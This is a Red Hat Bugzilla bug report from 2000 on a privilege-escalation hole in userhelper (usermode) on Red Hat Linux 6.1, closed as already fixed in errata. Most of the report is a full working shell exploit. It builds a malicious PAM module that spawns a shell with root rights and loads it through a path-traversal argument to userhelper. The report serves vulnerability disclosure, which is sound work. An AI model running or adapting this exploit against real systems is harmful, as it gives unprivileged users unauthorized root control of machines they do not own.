Bug 9825

Summary: pam crackable
Product: [Retired] Red Hat Linux Reporter: Rakesh Tiwari <tiwarirakesh>
Component: usermodeAssignee: Nalin Dahyabhai <nalin>
Status: CLOSED ERRATA QA Contact:
Severity: medium Docs Contact:
Priority: medium    
Version: 6.1Keywords: Security
Target Milestone: ---   
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2000-02-28 15:50:12 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---

Description Rakesh Tiwari 2000-02-28 11:53:33 UTC
by using the script, any normal user on a redhat 61 sever is able to get
'root' rights. The 'id' gets changed to 'root'.
#!/bin/sh
cat > _pamslam.c << EOF
#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>
void _init(void)
{
    setuid(geteuid());
    system("/bin/sh");
}
EOF

echo -n .

echo -e auth\\trequired\\t$PWD/_pamslam.so > _pamslam.conf
chmod 755 _pamslam.conf

echo -n .

gcc -fPIC -o _pamslam.o -c _pamslam.c

echo -n o

ld -shared -o _pamslam.so _pamslam.o

echo -n o

chmod 755 _pamslam.so

echo -n O


echo O

/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf

sleep 1s

Comment 1 Bill Nottingham 2000-02-28 15:50:59 UTC
This has already been fixed in the errata releases...